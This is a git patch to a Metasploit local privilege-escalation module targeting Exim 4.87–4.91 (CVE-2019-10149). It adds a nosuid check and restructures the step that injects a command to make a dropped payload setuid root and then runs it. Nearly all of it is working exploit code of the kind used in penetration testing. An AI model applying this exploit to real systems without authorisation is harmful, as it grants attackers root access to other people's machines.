From 565e18cbe8a2fcda4cf86631be524ce8a7d6b5eb Mon Sep 17 00:00:00 2001
From: Guillaume Andre <guillaume.andre33@gmail..com>
Date: Thu, 11 Jul 2019 14:20:21 +0100
Subject: [PATCH] Add a few checks

Change-Id: Ieca129a54d2105bf646e6f848cb5ecec804c372f
---
 .../local/exim4_deliver_message_priv_esc.rb   | 20 +++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb b/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb
index 051c1955dc..46fbd9e948 100644
--- a/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb
+++ b/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::FileDropper
   include Msf::Post::File
   include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
 
   def initialize(info = {})
     super(update_info(info,
@@ -16,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Local
       'Description'    => %q{
         This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
         Improper validation of recipient address in deliver_message()
-        function in /src/deliver.c may lead to remote command execution
+        function in /src/deliver.c may lead to command execution with root privileges
         (CVE-2019-10149).
       },
       'License'        => MSF_LICENSE,
@@ -133,8 +134,6 @@ class MetasploitModule < Msf::Exploit::Local
     else
       session.shell_command_token("rm -f #{@payload_path}")
     end
-
-    print_good("Check session #{session.name}, you should have a root shell!")
   end
 
   def check
@@ -166,6 +165,10 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::BadConfig, "#{base_dir} is not writable")
     end
 
+    if nosuid?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
+    end
+
     unless datastore['PrependSetuid'] && datastore['PrependSetgid']
       fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
                                     'to get root privileges.')
@@ -175,15 +178,12 @@ class MetasploitModule < Msf::Exploit::Local
     write_file(@payload_path, payload.encoded_exe)
     inject_payload(encode_command("/bin/bash -c \"chown root #{@payload_path};"\
                                   "chmod 4755 #{@payload_path}\""))
-    if setuid?(@payload_path)
-      cmd_exec("#{@payload_path & echo ")
 
-      if session_created?
-        return
-      end
+    unless setuid?(@payload_path)
+      rm_f(@payload_path)
+      fail_with(Failure::Unknown, "Couldn't escalate privileges")
     end
 
-    rm_f(@payload_path)
-    print_error("Couldn't escalate privileges")
+    cmd_exec("#{@payload_path} & echo ")
   end
 end